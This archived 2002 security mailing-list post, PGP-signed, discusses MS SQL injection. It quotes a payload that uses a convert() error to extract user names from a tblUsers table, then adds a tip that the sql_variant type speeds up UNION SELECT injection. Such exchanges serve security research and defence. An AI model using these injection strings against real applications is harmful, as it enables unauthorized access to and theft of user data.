-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 At 10:38 PM 5/9/2002, Kevin Spett wrote: >SELECT column must have the same data type. Try using the convert() hack to >get around this whole issue, like this: > >username=invalidusername' + convert(int, (SELECT TOP 1 UserName FROM >tblUsers WHERE Username > 'a')) + ''-- On a side note, MS SQL introduced the 'variant' datatype which will keep you from having to determine the actual column datatype by converting it for you as in: 'Union select convert(sql_variant,1),...' instead of 'union select 1,1,1,1...) Saves time for those in a hurry ;) AD -----BEGIN PGP SIGNATURE----- Version: PGP 7.1 iQA/AwUBPNv0G4hsmyD15h5gEQKZUQCg3gRzSKlqAOxVq7YYJ0bjESAaFDkAoLn0 8d8FuEPvTaC+7hXnDh/kAYPw =e28e -----END PGP SIGNATURE----- ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Mon May 13 2002 - 12:01:58 PDT